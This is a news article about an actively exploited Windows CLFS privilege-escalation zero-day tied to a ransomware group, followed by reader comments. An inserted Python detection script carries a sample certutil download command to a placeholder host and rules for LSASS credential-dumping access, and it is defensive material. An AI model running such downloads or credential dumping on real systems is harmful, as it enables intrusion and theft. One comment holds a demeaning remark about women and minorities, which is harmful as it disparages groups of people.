Windows under attack: 0-day vulnerability used by ransomware group

Microsoft released security updates for Windows yesterday and revealed today that the updates include a patch for a 0-day issue that is exploited in the wild.
The vulnerability -- Windows Common Log File System Driver Elevation of Privilege Vulnerability -- is tracked as CVE-2025-29824.
Important information:
- The issue affects most supported server and client versions of Windows, including Windows 10, Windows 11, and Windows Server 2025.
- Microsoft notes that the exploit does not work in Windows 11, version 24H2.
- It is a use-after-free security issue that may be exploited for local elevation attacks.
- The attack does not require user interaction.
- The attacker may gain system privileges upon successful exploitation.
Microsoft notes that it is aware of limited attacks. In a separate announcement on its security website, it specifically mentions targets in the IT and real estate sectors in the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia.
Installation of the update protects systems against exploits. Microsoft's guidance includes an ominous note revealing that the company is delaying the patch for Windows 10 systems. It does not provide an explanation for the delay. Affected users and administrators are asked to monitor the official CVE on Microsoft's MSRC website for updates regarding the rollout of the patch to Windows 10 systems.
Home users may use Windows Update to install the patch immediately on Windows 11. This is done via Settings > Windows Update. Note that a restart of the system is necessary to finalize the installation of the security update.
On the technical side, the vulnerability is found in the Common Log File System (CLFS) kernel driver, according to Microsoft. The company says that it has not determined the initial attack vector, but discovered "some notable pre-exploitation behaviors by Storm-2460".
Good to know: Storm-2460, which is better known as RansomEXX, is a notorious ransomware group.
Microsoft observed the following behavior in multiple cases:
- The threat actor uses the certutil tool to download a malicious file from a legitimate but compromised third-party website.
- The downloaded file was a malicious MSBuild file.
- The malware in question goes by the name PipeMagic, which has been known since 2023.
- After deployment, the malware exploits the vulnerability described in this article to inject code into system processes.
One of the malware's activities on the user's system is dumping and parsing LSASS memory to obtain user credentials. Ransomware activity followed on the target systems, notably file encryption and the appending of random file extensions.
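As an added defender-side illustration (not part of Microsoft's advisory or this article): a small Python scanner over constructed, simplified process events that flags the three behaviors described above, certutil downloading from a URL, MSBuild running a project file from a user-writable path, and an unusual process opening lsass.exe. The event shape, the paths and the lsass allow-list are assumptions, not real telemetry.

```python
import re

# Constructed, simplified events loosely modelled on Sysmon process-creation (id 1)
# and process-access (id 10) records. All paths and values are made up for this example.
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -urlcache -split -f https://example.invalid/x.bin C:\Users\u\AppData\Local\Temp\x.bin",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"id": 1, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Users\u\AppData\Local\Temp\x.proj",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"id": 10, "source": r"C:\Users\u\AppData\Local\Temp\svc.exe",
     "target": r"C:\Windows\System32\lsass.exe", "access": "0x1fffff"},
    {"id": 1, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -verify C:\certs\pub.cer",
     "parent": r"C:\Windows\explorer.exe"},
    {"id": 10, "source": r"C:\Windows\System32\csrss.exe",
     "target": r"C:\Windows\System32\lsass.exe", "access": "0x1400"},
]

URL_RE = re.compile(r"https?://", re.I)
USER_WRITABLE = re.compile(r"\\Users\\|\\Temp\\|\\ProgramData\\", re.I)
# Assumption: a minimal allow-list of system images expected to open lsass.exe;
# a real deployment would tune this to the environment's security tooling.
LSASS_ALLOW = {"csrss.exe", "wininit.exe", "lsass.exe", "msmpeng.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the detection names that fire for a single event."""
    hits = []
    if ev["id"] == 1:
        img, cmd = basename(ev["image"]), ev["cmdline"]
        # certutil fetching content from a URL (the download step described above)
        if img == "certutil.exe" and (URL_RE.search(cmd) or "-urlcache" in cmd.lower()):
            hits.append("certutil_download")
        # MSBuild executing a project file that sits in a user-writable location
        if img == "msbuild.exe" and USER_WRITABLE.search(cmd):
            hits.append("msbuild_user_writable_project")
    elif ev["id"] == 10:
        # handle to lsass.exe opened by something outside the allow-list (credential dumping)
        if ev["target"].lower().endswith("\\lsass.exe") and basename(ev["source"]) not in LSASS_ALLOW:
            hits.append("lsass_access_unusual_source")
    return hits

def scan(events):
    """Return (event index, detection name) pairs for every hit across the events."""
    return [(i, h) for i, ev in enumerate(events) for h in classify(ev)]

if __name__ == "__main__":
    for idx, name in scan(EVENTS):
        print(f"event {idx}: {name}")
```

Events 3 and 4 are benign controls: certutil without a URL and csrss.exe touching lsass.exe produce no hit.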
Closing Words
Microsoft recommends installing the Windows security patches immediately to protect systems from exploit attempts. The delay on Windows 10 is unfortunate, as it means that those systems remain vulnerable to attacks until Microsoft releases the patch for them.
Now You: when do you install updates on your systems? Did you install the April 2025 security updates already?


When I connect to your website my antivirus says it quarantined netix.io
If you are using an ad blocker and a browser that requires confirmation to download .exe, .zip or any potentially executable script file, you should be fine without any patches. And also auto-clear cache on browser exit and do not run any file you do not know from your download folder. Remember, for any of those vulnerabilities to work, you still have to click on the virus file or a shortcut to it. Unless I am missing something, browsers still cannot add programs or scripts to the autostart folder or registry. So look at what you are clicking.
From my personal anecdotal experience, I had picked up some dangerous stuff before from bundled program installers/downloaders and hacked programs. But not through some website exploit since like 20 years ago, when browsers did not have any security and any ransomware could lock your computer screen.
Hello everyone who is always commenting in Windows articles/posts to say “Use Linux”:
a) We won’t. Period.
b) Why are you reading about Windows?
c) Get a friend or a life.
Thank you,
Everyone that has a life
Walmart tech, we know gates is lucky to have failures that lease garbage and need something a chimp can run, it’s designed for women and minorities, like AI, so they can pretend to be intelligent.
Thanks, I came to laugh at the fools who need an OS that thinks for them, while thinking they’re safe. Defender has been absolute garbage from the day they bought it from Giant.
BAHAHHAAHHHAHAAHHAHAHHAHAHAHAAAA
Useless. These are empathy-deficient people who don’t realize how obnoxious and irritating they are with their fixed idea of Linux missionaryism.
It’s like asking spammers not to spam anymore.
They see themselves as wise missionaries bringing light to spiritually “misguided” aboriginal heretics. Typical behavior of typical religious fanatics.
They are unable to realize the fact that nobody needs them here with their missionary “work” (and everyone here knows that Linux exists).
Why generalize? You’ll find “missionaryism”, proselytism everywhere, but also calm, non-excited, non-hysterical people as well. Mistaking one’s commitment to an ecosystem, to an OS, a browser, and expressing his truth freely in words and in a tone free of any superiority, for proselytism is like proposing censorship to be applied to those we disagree with (you know, like the red-haired landlord). I remain stunned when observing the amount of clashes, be it on the Web as in life, initiated and carried out by the simple fact that one started to be intellectually “racist”, so to say. For those who initiate, who start the arrogance, I’d suggest calming down; for those who simply react to that arrogance (which is understandable), I’d suggest a smile like the one we offer to babies when they start crying.
@Tom Hawack
It’s an expected reaction in such cases to immediately invoke free speech.
But freedom of speech is not freedom of reach. And it does not invalidate the fact that the speaker is engaged in missionary activity where no one needs it.
These missionaries here are simply taking advantage of the fact that they can do their propaganda even though they have been told many times that they have said nothing new. You do realize that this site isn’t read by people who don’t know about linux, right?
There are many activities that would be much more useful in popularizing linux. But they require a lot of knowledge and effort, and such missionaries don’t want to do that.
P.S.
The aching desire to tell everyone in the first comment that they have switched to linux and how well they are doing now is really quite silly.
I encourage my computer shop’s customers to install 0patch on Windows 10. Microsoft support ends soon enough and 0patch will patch through 2030.
Oh dear. Too bad there isn’t an alternative OS that people could possibly install on those same systems, one that is developed openly with many eyes inspecting the code. One that will run most of the same programs and games, or at least suitable alternatives.
@Andy,
You’re obviously not a gamer. The list of games you cannot run on Linux is endless.
The ones you can run on Linux are old and it’s difficult to even get them to work.
I wish they would run on Linux. If they did, I would not have Windows on my gaming PCs.
Assuming your Gaming PC is halfway decent (hardware/spec-wise).
Install Linux and run Windows as a VM within VMware, which is completely free for personal use. This way you run a lean and far less targeted OS as the main host, but can simply fire up a working Windows installation at the click of a button, whenever you need it and for whatever purpose (e.g. for running a game).
In case something “bad” happens, just reload the VM and the problem is solved. Also, backing up a VM is less problematic than backing up a running OS.
The only thing you need for this is sufficient RAM and a sufficiently fast CPU (due to the additional OS overhead).
In principle this approach is quite similar to running Linux within WSL2 on a Windows system, but the differences are that here Linux (the less targeted OS) is the host system and the primarily targeted system is the guest, not the other way round, and that as a subsystem the guest is not sandboxed/isolated/contained on Windows, while a VM on Linux is isolated, as you want it to be.
@Tachy
Another commenter here mentioned that every Windows user has a life. I’m guessing gamers especially have lives.
I use linux for all my computing needs and could not be happier about it. I don’t spend many hours per day sitting in a chair, I’m always out and about socializing and doing sports. You know, almost like a life.
Linux doesn’t need to compete with Windows on any level, it’s just a free alternative, that’s all.
Some games with anticheat even run on Linux, it’s a matter of the developer to allow the anticheat to detect Linux and not block it but allow it. Some games on Steam allow that, like Marvel Rivals and that Chinese Delta Force game that released recently has an anticheat that currently doesn’t allow Linux, but the developers have said that they plan to add Linux support in the future.
There are indeed a lot of games that don’t run on Linux and it’s solely because of the anticheat, but I think the list of games that run is significantly bigger.
I count it as a blessing that over the last few years I lost almost all of my desire to play games, so now using Linux is much easier. I don’t have to worry about “is game X going to run or not?” I just don’t care, since I won’t play it anyway. It’s not the same for everyone, but if other people are in a similar situation, Linux can become a viable alternative.
Thanks for the info Martin.